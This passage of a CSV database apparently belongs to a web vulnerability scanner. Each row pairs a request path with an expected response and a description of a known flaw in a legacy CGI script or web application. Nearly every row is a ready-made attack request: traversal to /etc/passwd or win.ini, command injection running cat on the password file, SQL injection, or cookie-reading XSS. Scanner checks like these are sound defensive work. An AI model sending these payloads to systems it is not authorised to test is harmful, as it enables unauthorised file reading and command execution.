"000617","89","5","@CGIDIRShtsearch?exclude=%60/etc/passwd%60","GET","root:","","","","","This CGI contains a well known vul that allows attackers to read any system file.","",""
"000618","0","5","@CGIDIRSshop.cgi?page=../../../../../../../etc/passwd","GET","root:","","","","","Remote file read retrieval.","",""
"000619","0","5","@CGIDIRSsendtemp.pl?templ=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI contains a well known vul that allows attackers to read any system file.","",""
"000620","0","5","@CGIDIRSsearch/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc","GET","resolv.conf","","","","","It is possible to read files on the remote server, this CGI should be removed.","",""
"000621","0","5","@CGIDIRSsearch.pl?form=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","The ROADS search.pl allows attackers to retrieve system files.","",""
"000622","0","5","@CGIDIRSsearch.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini","GET","[fonts]","","","","","This CGI contains a well known vul that allows attackers to read any system file.","",""
"000623","0","5","@CGIDIRSsearch.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini","GET","[windows]","","","","","This CGI contains a well known vul that allows attackers to read any system file.","",""
"000624","0","5","@CGIDIRSquickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the remote system.","",""
"000625","0","5","@CGIDIRSpublisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10","GET","root:","","","","","AHG's search.cgi allows any command to be executed. www.ahg.com.","",""
"000626","0","5","@CGIDIRSphp.cgi?/etc/passwd","GET","root:","","","","","This allows attackers to read arbitrary files on the system and perhaps execute commands.","",""
"000627","0","5","@CGIDIRSpals-cgi?palsAction=restart&documentName=/etc/passwd","GET","root:","","","","","This CGI allows remote users to read system files.","",""
"000628","0","5","@CGIDIRSopendir.php?/etc/passwd","GET","root:","","","","","This CGI allows attackers to read any file on the web server.","",""
"000629","0","5","@CGIDIRSnph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","",""
"000630","0","5","@CGIDIRSnewsdesk.cgi?t=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to view arbitrary files on the server.","",""
"000631","0","5","@CGIDIRSnetauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to view arbitrary files on the server.","",""
"000632","0","5","@CGIDIRSmultihtml.pl?multi=/etc/passwd%00html","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the host. May also allow a shell to be spawned using http://www.packetstormsecurity.org/0009-exploits/multihtml.c","",""
"000633","0","5","@CGIDIRSwebdist.cgi?distloc=;cat%20/etc/passwd","GET","root:","","","","","This CGI allows attackers to read files remotely.","",""
"000634","0","5","@CGIDIRSway-board/way-board.cgi?db=/etc/passwd%00","GET","root:","","","","","Allows attackers to read arbitrary files from the server.","",""
"000635","0","5","@CGIDIRSway-board.cgi?db=/etc/passwd%00","GET","root:","","","","","Allows attackers to read arbitrary files from the server.","",""
"000636","0","5","@CGIDIRSview_item?HTML_FILE=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI allows reading of remote files.","",""
"000637","0","5","@CGIDIRSviewsource?/etc/passwd","GET","root:","","","","","Allows attacker to retrieve arbitrary files.  Remove from CGI directory.","",""
"000638","0","5","@CGIDIRSttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd","GET","root:","","","","","Tarantell TTAWeb Top CGI lets remote users read arbitrary files.","",""
"000639","0","5","@CGIDIRStraffic.cgi?cfg=../../../../../../../../etc/passwd","GET","root:","","","","","Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.","",""
"000640","0","5","@CGIDIRStechnote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read arbitrary files remotely.","",""
"000641","0","5","@CGIDIRStalkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1","GET","200","","","","","Talkback CGI displays arbitrary files","",""
"000642","0","5","@CGIDIRSstory/story.pl?next=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","story.pl versions older than 1.4 allow any file to be read remotely.","",""
"000643","0","5","@CGIDIRSstory.pl?next=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","story.pl versions older than 1.4 allow any file to be read remotely.","",""
"000644","0","5","@CGIDIRSstore/index.cgi?page=../../../../../../../../etc/passwd","GET","root:","","","","","CommerceSQL allows reading of arbitrary files. Default install found in /cgi-bin/store/, default login/pass is username/password.","",""
"000645","0","5","@CGIDIRSstore.cgi?StartID=../../../../../../../../../../etc/passwd%00.html","GET","root:","","","","","This CGI allows attackers to read arbitrary files remotely.","",""
"000646","0","5","@CGIDIRSssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd","GET","root:","","","","","The server install allows reading of any system file by sending encoded '../' directives.","",""
"000647","0","5","@CGIDIRSsojourn.cgi?cat=../../../../../../../../../../etc/password%00","GET","root:","","","","","This CGI allows attackers to read arbitrary files.","",""
"000648","0","5","@CGIDIRSsimple/view_page?mv_arg=|cat%20/etc/passwd|","GET","root:","","","","","This CGI allows attackers to execute commands on the host as the HTTP daemon owner.","",""
"000649","0","5","@CGIDIRSshopper.cgi?newpage=../../../../../../../../../../etc/passwd","GET","root:","","","","","Versions 1 and 2 of Byte's Interactive Web Shopper allow attackers to read files remotely. Uncomment the #$debug=1 variable.","",""
"000650","0","5","/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","The Novell Groupwise WebAcc Servlet allows attackers to view arbitrary files on the server.","",""
"000651","0","5","/webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd","GET","root:","","","","","Webcalendar 0.9.41 and below allow remote users to read arbitrary files.","",""
"000652","0","5","/logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|","GET","root:","","","","","Wordit Limited 2000 allows command execution.","",""
"000653","0","5","@CGIDIRSsawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1","GET","root:","","","","","Remote file retrieval.","",""
"000654","0","5","/page.cgi?../../../../../../../../../../etc/passwd","GET","root:","","","","","WWWeBBB Forum up to version 3.82beta allow arbitrary file retrieval.","",""
"000655","0","5","/edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd","GET","root:","","","","","EditTag allows arbitrary file retrieval.","",""
"000656","0","5","/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1","GET","root:","","","","","Remote file retrieval.","",""
"000659","0","5","@CGIDIRSzml.cgi?file=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","Ztreet Markup Language interpreter allows arbitrary file to be read remotely.","",""
"000660","0","5","@CGIDIRSYaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI lets users read any file with http daemon's permissions. Upgrade to latest version","",""
"000661","0","5","@CGIDIRSwhois_raw.cgi?fqdn=%0Acat%20/etc/passwd","GET","root:","","","","","Allows attacker to view any file (and possibly execute commands). Upgrade to latest version","",""
"000662","0","5","@CGIDIRSwhois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd","GET","root:","","","","","The whois.cgi allows any command to be executed on the system.","",""
"000663","0","5","@CGIDIRSwhois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd","GET","root:","","","","","The whois.cgi allows any command to be executed on the system.","",""
"000664","0","5","@CGIDIRSwebspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read arbitrary files.","",""
"000665","0","5","@CGIDIRSwebplus?script=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to retrieve files remotely.","",""
"000666","0","5","@CGIDIRSwebmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","",""
"000667","16861","8","/athenareg.php?pass=%20;cat%20/etc/passwd","GET","root:","","","","","Athena web registration remote command execution.","",""
"000668","278","7","/PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd","GET","root:","","","","","This default Netscape file allows an attacker to read arbitrary files on the host.","",""
"000669","0","5","/search?NS-query-pat=../../../../../../../../../../etc/passwd","GET","root:","","","","","The iPlanet server allows arbitrary files to be retrieved through the search functionality. Install 4.1 SP10+ or 6.0 SP3+","",""
"000670","0","5","/search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini","GET","boot loader","","","","","The iPlanet server allows arbitrary files to be retrieved through the search functionality. Install 4.1 SP10+ or 6.0 SP3+","",""
"000671","0","7","/..\..\..\..\..\..\temp\temp.class","GET","200","","","","","Cisco ACS 2.6.x and 3.0.1 (build 40) allows authenticated remote users to retrieve any file from the system. Upgrade to the latest version.","",""
"000672","0","7","/../../../../../../../../../../etc/passwd","GET","root:","","","","","It is possible to read files on the server by adding ../ in front of file name.","",""
"000673","0","7","/.../.../.../.../.../.../.../.../.../boot.ini","GET","boot loader","","","","","Software allows files to be retrieved outside of the web root by using 'triple dot' notation. May be MiniPortal?","",""
"000674","0","7","/................../etc/passwd","GET","root:","","","","","The web server allows the password file to be retrieved.","",""
"000675","0","3","/%3f.jsp","GET","Index of","","","","","JRun 3.0 and 3.1 on NT/2000 running IIS4 or IIS5 allow directory listing by requesting %3f.jsp at the end of a URL.","",""
"000676","0","3","/%3f.jsp","GET","Directory Listing","","","","","JRun 3.0 and 3.1 on NT/2000 running IIS4 or IIS5 allow directory listing by requesting %3f.jsp at the end of a URL.","",""
"000677","0","7","/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini","GET","[windows]","","","","","Attackers can read any file on the system. Upgrade to Analogx 1.07 or higher.","",""
"000678","0","7","/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd","GET","root:","","","","","Web server allows reading of files by sending encoded '../' requests. This server may be Boa (boa.org).","",""
"000679","0","3","/%00","GET","File Name","","","","","Appending /%00 to a request to the web server may reveal a directory listing.","",""
"000680","0","7","/ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini","GET","[windows]","","","","","It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name.","",""
"000681","0","7","/ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd","GET","root:","","","","","It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name.","",""
"000682","0","7","/ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini","GET","[fonts]","","","","","It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name.","",""
"000683","0","9","/admentor/adminadmin.asp","GET","200","","","","","Version 2.11 of AdMentor is vulnerable to SQL injection during login, in the style of: ' or =","",""
"000684","0","9","@POSTNUKEMy_eGallery/public/displayCategory.php","GET","200","","","","","My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.","",""
"000685","0","9","@CGIDIRSclassifieds/index.cgi","GET","200","","","","","My Classifieds pre 2.12 is vulnerable to SQL Injection attacks.","",""
"000686","0","9","/imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x","GET","parse error","","","","","IMP 2.x allows SQL injection, and reveals system information.","",""
"000687","0","9","/userinfo.php?uid=1;","GET","Query","","","","","Xoops portal gives detailed error messages including SQL syntax and may allow an exploit.","",""
"000688","0","9","/site/' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username=USER --/.html","GET","root:","","","","","IBM Informix Web DataBlade allows remote execute of SQL","",""
"000689","0","9","/site/' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username = USER --/.html","GET","root:","","","","","Web DataBlade 4.12/Informix is vulnerable to SQL Injection.","",""
"000690","0","9","/postnuke/index.php?module=My_eGallery","GET","200","","","","","My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.","",""
"000691","0","9","/postnuke/html/index.php?module=My_eGallery","GET","200","","","","","My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.","",""
"000692","0","8","@CGIDIRSalibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,","GET","boot.ini","","","","","This CGI allows attackers to execute arbitrary commands on the server.","",""
"000693","0","9","/phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=","GET","DB Error: syntax error","","","","","phpWebSite 0.9.x and below are vulnerable to SQL injection.","",""
"000694","0","9","/phpBB2/search.php?search_id=1\",","GET","SQL Error","","","","","phpBB 2.06 search.php is vulnerable to SQL injection attack. Error page also includes full path to search.php file.","",""
"000695","0","9","/index.php?module=My_eGallery","GET","200","","","","","My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.","",""
"000696","0","9","/author.asp","GET","200","","","","","May be FactoSystem CMS, which could include SQL injection problems which could not be tested remotely.","",""
"000697","0","4","/horde/test.php","GET","IMP: 3.(0|1|2|2\.1)","","","","","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerabl to Cross Site Scripting (XSS). See http://marc.theaimsgroup.com/?l=imp&m=105940167329471&w=2.","",""
"000698","0","4","/imp/horde/test.php","GET","IMP: 3.(0|1|2|2\.1)","","","","","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerabl to Cross Site Scripting (XSS). See http://marc.theaimsgroup.com/?l=imp&m=105940167329471&w=2.","",""
"000699","0","4","@CGIDIRShorde/test.php","GET","IMP: 3.(0|1|2|2\.1)","","","","","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerabl to Cross Site Scripting (XSS). See http://marc.theaimsgroup.com/?l=imp&m=105940167329471&w=2.","",""
"000700","0","4","/examples/cookie","GET","Cookie servlet","","","","","JEUS default servlet examples are vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages. http://securitytracker.com/alerts/2003/Jun/1007004.html","",""
"000701","0","4","/examples/session","GET","Session servlet","","","","","JEUS default servlet examples are vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages. http://securitytracker.com/alerts/2003/Jun/1007004.html","",""
"000702","0","4","/themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>","GET","<script>alert(document.cookie)</script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000703","0","4","/index.php?option=search&searchword=<script>alert(document.cookie);</script>","GET","<script>alert(document.cookie);</script>","","","","","Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000704","0","4","/emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script>","GET","<script>alert(document.cookie)</script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000705","0","4","/emailfriend/emailfaq.php?id=\"<script>alert(document.cookie)</script>","GET","<script>alert(document.cookie)</script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000706","0","4","/emailfriend/emailarticle.php?id=\"<script>alert(document.cookie)</script>","GET","<script>alert(document.cookie)</script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000707","0","4","/administrator/upload.php?newbanner=1&choice=\"<script>alert(document.cookie)</script>","GET","<script>alert(document.cookie)</script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000708","0","4","/administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script>","GET","<script>alert(document.cookie)</script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000709","0","4","/administrator/gallery/view.php?path=\"<script>alert(document.cookie)</script>","GET","<script>alert(document.cookie)</script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000710","0","4","/administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script>","GET","<script>alert(document.cookie)</script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000711","0","4","/administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script>","GET","<script>alert(document.cookie)</script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000712","0","4","/administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script>","GET","<script>alert(document.cookie)</script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000713","0","4","/index.php?dir=<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.","",""
"000714","0","4","/https-admserv/bin/index?/<script>alert(document.cookie)</script>","GET","<script>alert(document.cookie)</script>","","","","","Sun ONE Web Server 6.1 administration control is vulnerable to XSS attacks.","",""
"000715","0","4","/clusterframe.jsp?cluster=<script>alert(document.cookie)</script>","GET","<script>alert(document.cookie)</script>","","","","","Macromedia JRun 4.x JMC Interface, clusterframe.jsp file is vulnerable to a XSS attack.","",""
"000716","0","4","/article.cfm?id=1'<script>alert(document.cookie);</script>","GET","[SQL SERVER] Error Code","","","","","Coldfusion may reveal SQL information in malformed requests.","",""
"000717","0","4","/upload.php?type=\"<script>alert(document.cookie)</script>","GET","<script>alert(document.cookie)</script>","","","","","Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000718","4619","4","/soinfo.php?\"><script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","The PHP script soinfo.php is vulnerable to Cross Site Scripting Set expose_php = Off in php.ini.","",""
"000719","0","4","/modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert('Vulnerable');</script>;","GET","<script>alert('Vulnerable')</script>","","","","","Postnuke is vulnerable to Cross Site Scripting. CA-2000-02.","",""
"000720","0","4","/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>","GET","<script>alert('Vulnerable')</script>","","","","","Postnuke is vulnerable to Cross Site Scripting. CA-2000-02.","",""
"000721","0","4","/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script+>","GET","<script>alert('Vulnerable')</script+>","","","","","Postnuke is vulnerable to Cross Site Scripting. CA-2000-02.","",""
"000722","0","4","/webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef","GET","<script>alert('Vulnerable');</script>","","","","","Documentum Webtop (Tomcat 4.1) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000723","0","4","/addyoursite.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;","GET","<script>alert('Vulnerable')</script>","","","","","phpLinkat is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000724","0","4","/666%0a%0a<script>alert('Vulnerable');</script>666.jsp","GET","<script>alert('Vulnerable');</script>","","","","","Apache Tomcat 4.1 / Linux is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000725","0","4","/servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","NetDetector 3.0 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000726","0","4","/servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02.","",""
"000727","0","4","/servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02.","",""
"000728","0","4","/servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02.","",""
"000729","0","4","/servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02.","",""
"000730","0","4","/servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","The NetDetector install is vulnerable to Cross Site Scripting (XSS) in it's invalid login message. CA-2000-02.","",""
"000731","0","4","/<script>alert('Vulnerable')</script>.shtm","GET","<script>alert('Vulnerable')</script>.shtml","","","","","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000732","0","4","/<script>alert('Vulnerable')</script>.stm","GET","<script>alert('Vulnerable')</script>.shtml","","","","","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000733","0","4","/admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=Master